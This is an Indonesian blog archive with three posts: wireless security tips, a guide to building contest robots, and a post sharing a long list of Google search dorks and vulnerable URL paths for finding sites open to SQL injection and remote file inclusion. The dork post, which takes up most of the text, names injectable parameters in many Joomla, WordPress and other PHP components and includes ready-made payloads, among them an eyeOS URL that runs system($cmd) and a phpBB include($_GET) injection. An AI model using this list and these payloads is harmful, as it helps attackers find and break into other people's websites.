1. Memakai Enkripsi. Enkripsi adalah ukuran security yang pertama, tetapi banyak wireless access points (WAPs) tidak menggunakan enkripsi sebagai defaultnya. Meskipun banyak WAP telah memiliki Wired Equivalent Privacy (WEP) protocol, tetapi secara default tidak diaktifkan. WEP memang mempunyai beberapa lubang di securitynya, dan seorang hacker yang berpengalaman pasti dapat membukanya, tetapi itu masih tetap lebih baik daripada tidak ada enkripsi sama sekali. Pastikan untuk men-set metode WEP authentication dengan “shared key” daripada “open system”. Untuk “open system”, dia tidak meng-encrypt data, tetapi hanya melakukan otentifikasi client. Ubah WEP key sesering mungkin, dan pakai 128-bit WEP dibandingkan dengan yang 40-bit.

2. Gunakan Enkripsi yang Kuat. Karena kelemahan kelemahan yang ada di WEP, maka dianjurkan untuk menggunakan Wi-Fi Protected Access (WPA) juga. Untuk memakai WPA, WAP harus men-supportnya. Sisi client juga harus dapat men-support WPA tsb.

3. Ganti Default Password Administrator. Kebanyakan pabrik menggunakan password administrasi yang sama untuk semua WAP produk mereka. Default password tersebut umumnya sudah diketahui oleh para hacker, yang nantinya dapat menggunakannya untuk merubah setting di WAP anda. Hal pertama yang harus dilakukan dalam konfigurasi WAP adalah mengganti password default tsb. Gunakan paling tidak 8 karakter, kombinasi antara huruf dan angka, dan tidak menggunakan kata kata yang ada dalam kamus.

4. Matikan SSID Broadcasting. Service Set Identifier (SSID) adalah nama dari wireless network kita. Secara default, SSID dari WAP akan di broadcast. Hal ini akan membuat user mudah untuk menemukan network tsb, karena SSID akan muncul dalam daftar available networks yang ada pada wireless client. Jika SSID dimatikan, user harus mengetahui lebih dahulu SSID-nya agak dapat terkoneksi dengan network tsb.

5. Matikan WAP Saat Tidak Dipakai. Cara yang satu ini kelihatannya sangat simpel, tetapi beberapa perusahaan atau individual melakukannya. Jika kita mempunyai user yang hanya terkoneksi pada saat saat tertentu saja, tidak ada alasan untuk menjalankan wireless network setiap saat dan menyediakan kesempatan bagi intruder untuk melaksanakan niat jahatnya. Kita dapat mematikan access point pada saat tidak dipakai.

6. Ubah default SSID. Pabrik menyediakan default SSID. Kegunaan dari mematikan broadcast SSID adalah untuk mencegah orang lain tahu nama dari network kita, tetapi jika masih memakai default SSID, tidak akan sulit untuk menerka SSID dari network kita.

7. Memakai MAC Filtering. Kebanyakan WAP (bukan yang murah murah tentunya) akan memperbolehkan kita memakai filter media access control (MAC). Ini artinya kita dapat membuat “white list” dari computer computer yang boleh mengakses wireless network kita, berdasarkan dari MAC atau alamat fisik yang ada di network card masing masing pc. Koneksi dari MAC yang tidak ada dalam list akan ditolak. Metode ini tidak selamanya aman, karena masih mungkin bagi seorang hacker melakukan sniffing paket yang kita transmit via wireless network dan mendapatkan MAC address yang valid dari salah satu user, dan kemudian menggunakannya untuk melakukan spoof. Tetapi MAC filtering akan membuat kesulitan seorang intruder yang masih belum jago jago banget.

8. Mengisolasi Wireless Network dari LAN. Untuk memproteksi internal network kabel dari ancaman yang datang dari wireless network, perlu kiranya dibuat wireless DMZ atau perimeter network yang mengisolasi dari LAN. Artinya adalah memasang firewall antara wireless network dan LAN. Dan untuk wireless client yang membutuhkan akses ke internal network, dia haruslah melakukan otentifikasi dahulu dengan RAS server atau menggunakan VPN. Hal ini menyediakan extra layer untuk proteksi.

9. Mengontrol Signal Wireless. 802.11b WAP memancarkan gelombang sampai dengan kira kira 300 feet. Tetapi jarak ini dapat ditambahkan dengan cara mengganti antenna dengan yang lebih bagus. Dengan memakai high gain antena, kita bisa mendapatkan jarak yang lebih jauh. Directional antenna akan memancarkan sinyal ke arah tertentu, dan pancarannya tidak melingkar seperti yang terjadi di antenna omnidirectional yang biasanya terdapat pada paket WAP setandard. Selain itu, dengan memilih antena yang sesuai, kita dapat mengontrol jarak sinyal dan arahnya untuk melindungi diri dari intruder. Sebagai tambahan, ada beberapa WAP yang bisa di setting kekuatan sinyal dan arahnya melalui config WAP tsb.

10. Memancarkan Gelombang pada Frequensi yang Berbeda. Salah satu cara untuk bersembunyi dari hacker yang biasanya memakai teknologi 802.11b/g yang lebih populer adalah dengan memakai 802.11a. Karena 802.11a bekerja pada frekwensi yang berbeda (yaitu di frekwensi 5 GHz), NIC yang di desain untuk bekerja pada teknologi yang populer tidak akan dapat menangkap sinyal tsb.

Semoga Tips-tips ini dapat berguna dan bisa menambah wawasan kita semua....amin.

Tutorial Membuat Robot Cerdas

2010-09-12T12:14:00.000-07:00

Nah Sekarang saya Coba Share tentang Cara menciptakan suatu robot cerdas...
Silahkan Dibaca terlebih dahulu.... ^^

Tahap-tahap pembuatan robot
Secara garis besar, tahapan pembuatan robot dapat dilihat pada gambar berikut:

Ada tiga tahapan pembuatan robot, yaitu:

1. Perencanaan, meliputi: pemilihan hardware dan design.
2. Pembuatan, meliputi pembuatan mekanik, elektonik, dan program.
3. Uji coba.

I. Tahap perencanan
Dalam tahap ini, kita merencanakan apa yang akan kita buat, sederhananya, kita mau membuat robot yang seperti apa? berguna untuk apa?

Hal yang perlu ditentukan dalam tahap ini:
Dimensi, yaitu panjang, lebar, tinggi, dan perkiraan berat dari robot. Robot KRI berukuran tinggi sektar 1m, sedangkan tinggi robot KRCI sekitar 25 cm.
Struktur material, apakah dari alumunium, besi, kayu, plastik, dan sebagainya.
Cara kerja robot, berisi bagian-bagian robot dan fungsi dari bagian-bagian itu. Misalnya lengan, konveyor, lift, power supply.
Sensor-sensor apa yang akan dipakai robot.
Mekanisme, bagaimana sistem mekanik agar robot dapat menyelesaikan tugas.
Metode pengontrolan, yaitu bagaimana robot dapat dikontrol dan digerakkan, mikroprosesor yanga digunakan, dan blok diagram sistem.
Strategi untuk memenangkan pertandingan, jika memang robot itu akan diikutkan lomba/kontes robot Indonesia/Internasional.

II. Tahap pembuatan
Ada tiga perkerjaan yang harus dilakukan dalam tahap ini, yaitu pembuatan mekanik, elektronik, dan programming. Masing-masing membutuhkan orang dengan spesialisasi yang berbeda-beda, yaitu:

Spesialis Mekanik, bidang ilmu yang cocok adalah teknik mesin dan teknik industri.
Spesialis Elektronika, bidang ilmu yang cocok adalah teknik elektro.
Spesialis Programming, bidang ilmu yang cocok adalah teknik informatika.
Jadi dalam sebuah tim robot, harus ada personil-personil yang memiliki kemampuan tertentu yang saling mengisi. Hal ini diperlukan dalam membentuk Tim Kontes Robot Indonesia (KRI) atau Kontes Robot Cerdas Indonesia (KRCI). Bidang ilmu yang saya sebutkan tadi, tidak harus diisi mahasiswa/alumni jurusan atau program studi tersebut, misalnya boleh saja mahasiswa jurusan teknik mesin belajar pemrograman.

Untuk mengikuti lomba KRI/KRCI dibutuhkan sebuah tim yang solid. Tetapi buat Anda yang tertarik membuat robot karena hobby atau ingin belajar, semua bisa dilakukan sendiri, karena Anda tidak terikat dengan waktu atau deadline. Jadi Anda bisa melakukannya dengan lebih san

Pembuatan mekanik
Setelah gambaran garis besar bentuk robot dirancang, maka rangka dapat mulai dibuat. Umumnya rangka robot KRI terbuat dari alumunium kotak atau alumunium siku. Satu ruas rangka terhubung satu sama lain dengan keling alumunium. Keling adalah semacam paku alumunium yang berguna untuk menempelkan lembaran logam dengan erat. Rangka robot KRCI lebih variatif, bisa terbuat dari plastik atau besi panjang seperti jeruji.

Pembuatan sistem elektronika
Bagian sistem elektronika dirancang sesuai dengan fungsi yang diinginkan. Misalnya untuk menggerakkan motor DC diperlukan h-brigde, sedangkan untuk menggerakkan relay diperlukan saklar transistor. Sensor-sensor yang akan digunakan dipelajari dan dipahami cara kerjanya, misalnya:

1. Sensor jarak, bisa menggunakan SRF04, GP2D12, atau merakit sendiri modul sensor ultrasonik atau inframerah.
2. Sensor arah, bisa menggunakan sensor kompas CMPS03 atau Dinsmore.
3. Sensor suhu, bisa menggunakan LM35 atau sensor yang lain.
4. Sensor nyala api/panas, bisa menggunakan UVTron atau Thermopile.
5. Sensor line follower / line detector, bisa menggunakan led & photo transistor.

Berikut ini gambar sensor ultrasonik, inframerah, UVTron, dan kompas:

Pembuatan sistem elektronika ini meliputi tiga tahap:
1. Design PCB, misalnya dengan program Altium DXP.
2. Pencetakan PCB, bisa dengan Proboard.
3. Perakitan dan pengujian rangkaian elektronika.

Pembuatan Software/Program
Pembuatan software dilakukan setelah alat siap untuk diuji. Software ini ditanamkan (didownload) pada mikrokontroler sehingga robot dapat berfungsi sesuai dengan yang diharapkan.

Tahap pembuatan program ini meliputi:
1. Perancangan Algoritma atau alur program
Untuk fungsi yang sederhana, algoritma dapat dibuat langsung pada saat menulis program. Untuk fungsi yang kompleks, algoritma dibuat dengan menggunakan flow chart.
2. Penulisan Program
Penulisan program dalam Bahasa C, Assembly, Basic, atau Bahasa yang paling dikuasai.
3. Compile dan download, yaitu mentransfer program yang kita tulis kepada robot.

III. Uji coba
Setelah kita mendownload program ke mikrokontroler (otak robot) berarti kita siap melakukan tahapan terakhir dalam membuat robot, yaitu uji coba. Untuk KRCI, ujicoba dilakukan pada arena seluas sekitar 4×4 meter dan berbentuk seperti puzzle. Dalam arena KRCI ini diletakkan lilin-lilin yang harus dipadamkan oleh robot cerdas pemadam api. Contoh gambar robot pemadam api Ted Larsorn dan arena Kontes Robot Cerdas Indonesia (KRCI).

Penulis: Oka Mahendra (http://tutorialgratis.net)

Spesial Thanks : Devilzc0de Team Yang Sudah Bersedia Share Tutorial ini...

Selamat mencoba dan belajar menciptakan suatu robotic :)

Share Dork Lengkap

2010-09-12T05:30:00.002-07:00

Langsung Aja...

allinurl:"union+all+select" site:my
inurl:index.php?id=
inurl:trainers.php?id=

inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:".php?id=1"
inurl:".php?cat=1"
inurl:".php?catid=1"
inurl:".php?num=1"
inurl:".php?bid=1"
inurl:".php?pid=1"
inurl:".php?nid=1"

inurl:mod.php?mod=publisher&op=

RFI
/components/com_flyspray/startdown.php?file=
/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=
/components/com_simpleboard/file_upload.php?sbp=
/components/com_hashcash/server.php?mosConfig_absolute_path=
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
/components/com_performs/performs.php?mosConfig_absolute_path=
/components/com_forum/download.php?phpbb_root_path=
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=
/components/minibb/index.php?absolute_path=
/components/com_smf/smf.php?mosConfig_absolute_path=
/modules/mod_calendar.php?absolute_path=
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=
/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=
/components/com_securityimages/lang.php?mosConfig_absolute_path=
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=
/akocomments.php?mosConfig_absolute_path=
/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
/cropcanvas.php?cropimagedir=
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=
/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=
/components/com_zoom/includes/database.php?mosConfig_absolute_path=
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
/components/com_fm/fm.install.php?lm_absolute_path=
/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=
/components/com_lmo/lmo.php?mosConfig_absolute_path=
/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=
/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=
/administrator/components/com_webring/admin.webring.docs.php?component_dir=
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=
/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=
/components/com_mambowiki/Mam***ogin.php?IP=
/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=
/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
/components/com_cpg/cpg.php?mosConfig_absolute_path=
/components/com_moodle/moodle.php?mosConfig_absolute_path=
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
/components/com_mospray/scripts/admin.php?basedir=
/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=
/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=
/components/com_madeira/img.php?url=
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=
/com_bsq_sitestats/external/rssfeed.php?baseDir=
/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=
/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=
/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=
/administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=
/components/com_joomlaboard/file_upload.php?sbp=
/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=
/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=
/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=
/modules/mod_weather.php?absolute_path=
/components/calendar/com_calendar.php?absolute_path=
/modules/calendar/mod_calendar.php?absolute_path=
/components/com_calendar.php?absolute_path=
/modules/mod_calendar.php?absolute_path=
/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=
/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=
/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=
/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=
/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=
/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=
/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=
/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=
/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=
/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=

Wordpress
index/wp-content/plugins/Enigma2.php?boarddir=
mygallery/myfunctions/mygallerybrowser.php?myPath=
plugins/wp-table/js/wptable-button.phpp?wpPATH=
plugins/wordtube/wordtube-button.php?wpPATH=
plugins/myflash/myflash-button.php?wpPATH=
plugins/BackUp/Archive.php?bkpwp_plugin_path=
plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=
plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=
plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=
plugins/sniplets/modules/syntax_highlight.php?libpath=

inurl:/modules/My_eGallery/public/displayCategory.php?basepath=
inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
inurl:/include/new-visitor.inc.php?lvc_include_dir=
inurl:/_functions.php?prefix=
inurl:/cpcommerce/_functions.php?prefix=
inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=
inurl:/modules/agendax/addevent.inc.php?agendax_path=
inurl:/ashnews.php?pathtoashnews=
inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=
inurl:/pm/lib.inc.php?pm_path=
inurl:/b2-tools/gm-2-b2.php?b2inc=
inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
inurl:/modules/agendax/addevent.inc.php?agendax_path=
inurl:/includes/include_once.php?include_file=
inurl:/e107/e107_handlers/secure_img_render.php?p=
inurl:/shoutbox/expanded.php?conf=
inurl:/main.php?x=
inurl:/myPHPCalendar/admin.php?cal_dir=
inurl:/index.php/main.php?x=
inurl:/index.php?include=
inurl:/index.php?x=
inurl:/index.php?open=
inurl:/index.php?visualizar=
inurl:/template.php?pagina=
inurl:/index.php?pagina=
inurl:/index.php?inc=
inurl:/includes/include_onde.php?include_file=
inurl:/index.php?page=
inurl:/index.php?pg=
inurl:/index.php?show=
inurl:/index.php?cat=
inurl:/index.php?file=
inurl:/db.php?path_local=
inurl:/index.php?site=
inurl:/htmltonuke.php?filnavn=
inurl:/livehelp/inc/pipe.php?HCL_path=
inurl:/hcl/inc/pipe.php?HCL_path=
inurl:/inc/pipe.php?HCL_path=
inurl:/support/faq/inc/pipe.php?HCL_path=
inurl:/help/faq/inc/pipe.php?HCL_path=
inurl:/helpcenter/inc/pipe.php?HCL_path=
inurl:/live-support/inc/pipe.php?HCL_path=
inurl:/gnu3/index.php?doc=
inurl:/gnu/index.php?doc=
inurl:/phpgwapi/setup/tables_update.inc.php?appdir=
inurl:/forum/install.php?phpbb_root_dir=
inurl:/includes/calendar.php?phpc_root_path=
inurl:/includes/setup.php?phpc_root_path=
inurl:/inc/authform.inc.php?path_pre=
inurl:/include/authform.inc.php?path_pre=
inurl:index.php?nic=
inurl:index.php?sec=
inurl:index.php?content=
inurl:index.php?link=
inurl:index.php?filename=
inurl:index.php?dir=
inurl:index.php?*****=
inurl:index.php?view=
inurl:*.php?sel=
inurl:*.php?session=&content=
inurl:*.php?locate=
inurl:*.php?place=
inurl:*.php?layout=
inurl:*.php?go=
inurl:*.php?catch=
inurl:*.php?mode=
inurl:*.php?name=
inurl:*.php?loc=
inurl:*.php?f=
inurl:*.php?inf=
inurl:*.php?pg=
inurl:*.php?load=
inurl:*.php?naam=
allinurl:/index.php?page= site:*.dk
allinurl:/index.php?file= site:*.dk
INURL OR ALLINURL WITH:
/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=
/includes/header.php?systempath=
/Gallery/displayCategory.php?basepath=
/index.inc.php?PATH_Includes=
/ashnews.php?pathtoashnews=
/ashheadlines.php?pathtoashnews=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/demo/includes/init.php?user_inc=
/jaf/index.php?show=
/inc/shows.inc.php?cutepath=
/poll/admin/common.inc.php?base_path=
/pollvote/pollvote.php?pollname=
/sources/post.php?fil_config=
/modules/My_eGallery/public/displayCategory.php?basepath=
/bb_lib/checkdb.inc.php?libpach=
/include/livre_include.php?no_connect=lol&chem_absolu=
/index.php?from_market=Y&pageurl=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/pivot/modules/module_db.php?pivot_path=
/modules/4nAlbum/public/displayCategory.php?basepath=
/derniers_commentaires.php?rep=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
/coppermine/themes/maze/theme.php?THEME_DIR=
/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
/myPHPCalendar/admin.php?cal_dir=
/agendax/addevent.inc.php?agendax_path=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
/main.php?page=
/default.php?page=
/index.php?action=
/index1.php?p=
/index2.php?x=
/index2.php?content=
/index.php?conteudo=
/index.php?cat=
/include/new-visitor.inc.php?lvc_include_dir=
/modules/agendax/addevent.inc.php?agendax_path=
/shoutbox/expanded.php?conf=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/pivot/modules/module_db.php?pivot_path=
/library/editor/editor.php?root=
/library/lib.php?root=
/e107/e107_handlers/secure_img_render.php?p=
/zentrack/index.php?configFile=
/main.php?x=
/becommunity/community/index.php?pageurl=
/GradeMap/index.php?page=
/index4.php?body=
/side/index.php?side=
/main.php?page=
/es/index.php?action=
/index.php?sec=
/index.php?main=
/index.php?sec=
/index.php?menu=
/html/page.php?page=
/page.php?view=
/index.php?menu=
/main.php?view=
/index.php?page=
/content.php?page=
/main.php?page=
/index.php?x=
/main_site.php?page=
/index.php?L2=
/content.php?page=
/main.php?page=
/index.php?x=
/main_site.php?page=
/index.php?L2=
/index.php?show=
/tutorials/print.php?page=
/index.php?page=
/index.php?level=
/index.php?file=
/index.php?inter_url=
/index.php?page=
/index2.php?menu=
/index.php?level=
/index1.php?main=
/index1.php?nav=
/index1.php?link=
/index2.php?page=
/index.php?myContent=
/index.php?TWC=
/index.php?sec=
/index1.php?main=
/index2.php?page=
/index.php?babInstallPath=
/main.php?body=
/index.php?z=
/main.php?view=
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
/index.php?file=
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

1. allinurl:my_egallery site:.org
/modules/My_eGallery/public/displayCategory.php?basepath=
2. allinurl:xgallery site:.org
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
3. allinurl:coppermine site:.org
/modules/coppermine/themes/default/theme.php?THEME_DIR=
4. allinurl:4nAlbum site:.org
/modules/4nAlbum/public/displayCategory.php?basepath=

5. allinurlP:NphpBB2 site:.org
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

6. allinurl:ihm.php?p=

7. Keyword : "powered by AllMyLinks"
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

8. allinurl:/modules.php?name=allmyguests
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

9. allinurl:/Popper/index.php?
/Popper/index.php?childwindow.inc.php?form=

10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
yahoo = by Kietu? v 3.2
/kietu/index.php?kietu[url_hit]=

11. keyword : "Powered by phpBB 2.0.6"
/html&highlight=%2527.include($_GET[a]),exit.%2527&a=

12. keyword : "powered by CubeCart 3.0.6"
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

13. keyword : "powered by paBugs 2.0 Beta 3"
/class.mysql.php?path_to_bt_dir=

14. allinurl:"powered by AshNews", allinurl:AshNews atau allinurl: /ashnews.php
/ashnews.php?pathtoashnews=

15. keyword : /phorum/login.php
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

16. allinurl:ihm.php?p=*

14. keyword : "powered eyeOs"
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);&a=

15. allinurl:.php?bodyfile=

16. allinurl:/includes/orderSuccess.inc.php?glob=
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

17. allinurl:forums.html
/modules.php?name=

18. allinurl:/default.php?page=home

19. allinurl:/folder.php?id=

20. allinurl:main.php?pagina=
/paginedinamiche/main.php?pagina=

21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests")
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

22. allinurl:application.php?base_path=
/application.php?base_path=

23. allinurlp:hplivehelper
/phplivehelper/initiate.php?abs_path=

24. allinurlp:hpnuke
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

25. key word : "powered by Fantastic News v2.1.2"
/archive.php?CONFIG[script_path]=

26. keyword: "powered by smartblog" AND inurl:?page=login
/index.php?page=

27. allinurl:/forum/
/forum/admin/index.php?inc_conf=

28. keyword:"Powered By FusionPHP"
/templates/headline_temp.php?nst_inc=

29. allinurl:shoutbox/expanded.php filetypep:hp
/shoutbox/expanded.php?conf=

30. allinurl: /osticket/
/osticket/include/main.php?config[search_disp]=true&include_dir=

31. keyword : "Powered by iUser"
/common.php?include_path=

32. allinurl: "static.php?load="
/static.php?load=

33. keyworld : /phpcoin/login.php
/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=

34. keyworld: allinurl:/phpGedview/login.php site:
/help_text_vars.php?dir&PGV_BASE_DIRECTORY=

35. allinurl:/folder.php?id=
/classes.php?LOCAL_PATH=

inurl:"/lire.php?rub="
inurl:"/os/pointer.php?url="
inurl:"folder.php?id="
inurl:"show.php?page="
inurl:"index2.php?DoAction="
inurl:"index.php?canal="
inurl:"index.php?screen="
inurl:"index.php?langc="
inurl:"index.php?Language="
inurl:"view.php?page="

dork: "powered by doodle cart"
rfi of this dork: enc/content.php?Home_Path=

dork: "Login to Calendar"
rfi of this dork: /embed/day.php?path=

